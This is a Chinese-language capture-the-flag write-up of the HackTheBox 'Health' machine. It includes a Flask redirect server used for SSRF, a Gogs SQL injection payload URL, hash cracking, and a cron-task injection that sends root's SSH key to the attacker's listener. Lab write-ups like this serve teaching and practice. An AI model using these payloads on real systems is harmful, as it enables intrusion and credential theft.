HackTheBox - Medium - Linux - Health

这篇具有很好参考价值的文章主要介绍了HackTheBox - Medium - Linux - Health。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Health

Health 是一台中型 Linux 计算机,在主网页上存在 SSRF 漏洞,可利用该漏洞访问仅在 localhost 上可用的服务。更具体地说,Gogs 实例只能通过 localhost 访问,并且此特定版本容易受到 SQL 注入攻击。由于攻击者可以与 Gogs 实例交互的方式,在这种情况下,最好的方法是通过在本地计算机上安装相同的 Gogs 版本,然后使用自动化工具生成有效的有效负载来复制远程环境。在检索用户“susanne”的哈希密码后,攻击者能够破解哈希并泄露该用户的纯文本密码。可以使用相同的凭据通过 SSH 向远程计算机进行身份验证。权限提升依赖于在用户“root”下运行的 cron 作业。这些 cron 作业与主 Web 应用程序的功能相关,并处理数据库中未经筛选的数据。因此,攻击者能够在数据库中注入恶意任务并泄露用户“root”的 SSH 密钥文件,从而允许他在远程计算机上获得 root 会话。


外部信息收集

端口扫描

循例nmap

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

Web枚举

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

看起来就觉得可能存在SSRF,扫一下vhost

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

还有过滤

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

test

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

监听url会有一个get请求,当我断开nc之后,payload url又来了一个post

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

本地起个http server,当监听url访问过来的时候重定向到localhost

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def index():
    return redirect('http://127.0.0.1')

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8001)

这里一定要是always,否则payload url可能收不到post请求

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

可以看到响应,说明重定向成功了

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

接下来就可以爆破端口,找到内网的服务,为了方便直接wp跳过这些无聊的环节

3000端口有一个gogs

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

Foothold

谷歌能找到该版本似乎存在sql injection

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

poc:

http://127.0.0.1:3000/api/v1/users/search?q=')%09union%09all%09select%091,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%09--%09-

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

查数据

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

得到susanne的密码hash

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

在谷歌中能搜到gogs使用PBKDF2 + hmac + sha256

https://github.com/kxcode/KrackerGo/tree/master

这里也描述了如何利用它

将16进制转回去如何base64

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

将salt base64

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

hashcat

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

不出意外我们能够通过这种凭据登录ssh

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

本地权限提升

传个pspy

2024/01/17 15:29:01 CMD: UID=0     PID=4350   | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1 
2024/01/17 15:29:01 CMD: UID=0     PID=4351   | sleep 5 
2024/01/17 15:29:01 CMD: UID=???   PID=4354   | ???
2024/01/17 15:29:01 CMD: UID=0     PID=4352   | 
2024/01/17 15:29:01 CMD: UID=0     PID=4357   | grep columns 
2024/01/17 15:29:01 CMD: UID=???   PID=4356   | ???
2024/01/17 15:29:01 CMD: UID=0     PID=4355   | sh -c stty -a | grep columns 
2024/01/17 15:29:06 CMD: UID=0     PID=4358   | mysql laravel --execute TRUNCATE tasks 

从artisan跟到app/Console/Kernel.php

protected function schedule(Schedule $schedule)
    {

        /* Get all tasks from the database */
        $tasks = Task::all();

        foreach ($tasks as $task) {

            $frequency = $task->frequency;

            $schedule->call(function () use ($task) {
                /*  Run your task here */
                HealthChecker::check($task->webhookUrl, $task->monitoredUrl, $task->onlyError);
                Log::info($task->id . ' ' . \Carbon\Carbon::now());
            })->cron($frequency);

同时,在网站根目录下的.env文件中也包含了mysql的凭据

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

进到mysql后有个tasks空表,desc

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

应该就是之前的web,直接读root ssh key然后返回到我们的payload url

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

nc

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

sed将\n转义和去除多余的\

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

登root的ssh

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

HackTheBox - Medium - Linux - Health,HackTheBox,网络安全,HackTheBox,linux渗透测试,配置错误

其实也可以直接在tasks里读root flag文章来源地址https://www.toymoban.com/news/detail-800964.html

到了这里,关于HackTheBox - Medium - Linux - Health的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 「Kali Linux」网络安全黑客自学、网络渗透(文末送书)

    目录 1.背景介绍 2.读者对象 3.随书资源 4.本书目录 5.本书概览 6.活动参与方式  对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。 企业的安

    2024年02月08日
    浏览(48)
  • 【Linux&网络安全】Linux操作系统安全配置(超全超详细)

    查看账号 在我们Linux系统当中,默认的情况下,所有的系统上的帐号与一般身份使用者,还有root的相关信息, 都是记录在/etc/passwd这个文件内的。至于个人的密码则是记录在/etc/shadow这个文件下。 此外,Linux所有的群组名称都纪录在/etc/group内!这三个文件可以说是Linux系统里

    2024年02月01日
    浏览(40)
  • KALI LINUX网络安全监控工具

    Snort是一款常用的开源入侵检测系统,被广泛应用于渗透测试、网络安全监控和入侵检测等领域。作为一名渗透测试工程师,了解Snort的原理、配置和使用方法是非常必要的。本文将详细介绍Snort的工作原理、配置方法和使用技巧,希望可以帮助读者更好的理解和应用这个工具

    2024年02月02日
    浏览(40)
  • Linux网络操作实操指南:从网络配置到安全管理

    Linux是一种开源的操作系统,具有稳定性高、安全性好、可定制性强等优点。作为一名Linux用户,掌握基本的Linux网络操作是非常必要的。以下是Linux网络操作的几个方面,包括具体的实操步骤: 1. 网络配置 Linux中的网络配置需要设置IP地址、子网掩码、网关等参数,以实现网

    2024年02月09日
    浏览(45)
  • 深入探索:Kali Linux 网络安全之旅

    目录 前言 访问官方网站 导航到下载页面 启动后界面操作 前言 \\\"Kali\\\" 可能指的是 Kali Linux,它是一种基于 Debian 的 Linux 发行版,专门用于渗透测试、网络安全评估、数字取证和相关的安全任务。Kali Linux 旨在提供一系列用于测试网络和系统安全性的工具,以及为安全专业人员

    2024年02月12日
    浏览(43)
  • 【文末送书】Kali Linux与网络安全

    欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C++、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关注公粽号 《机器和智能》 回复 “python项目

    2024年02月08日
    浏览(38)
  • 【网络安全】-Linux操作系统—操作系统发展历史与Linux

    操作系统(Operating System,简称OS)是管理计算机硬件与软件资源的系统软件,它是计算机系统的核心与基石。操作系统的发展历史可以追溯到20世纪50年代。 初期的操作系统 在计算机技术的早期,操作系统并不存在。那时,计算机使用一种叫做批处理系统的方式来运行程序。

    2024年02月03日
    浏览(60)
  • kali linux网络安全弱口令爆破常用命令(二)

    Kali Linux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。 1. 主机(Host): 要尝试

    2024年02月03日
    浏览(49)
  • 网络安全 Day11-Linux文件属性及权限知识

    作用: 给文件或目录加锁不让改不让删除 语法: chattr 选项 文件 选项属性 -i 个文件加锁不能删改 -a 可以追加内容 选项动作 - 减少 + 增加 练习: 给文件加锁-查看属性-更改文件-解锁-查看属性 生产应用: 想要快捷的对上锁的文件进行改动可以考虑使用脚本 查看文件属性: ls -

    2024年02月13日
    浏览(52)
  • Emvirus: 基于 embedding 的神经网络来预测 human-virus PPIs【Biosafety and Health,2023】

    Human-virus PPIs 预测对于理解病毒感染机制、病毒防控等十分重要; 大部分基于 machine-learning 预测 human-virus PPIs 的方法利用手动方法处理序列特征,包括统计学特征、系统发育图谱、理化性质等; 本文作者提出了一个名为 Emvirus 的方法,它利用 Doc2Vec 获取蛋白序列特征,并将序

    2024年02月15日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包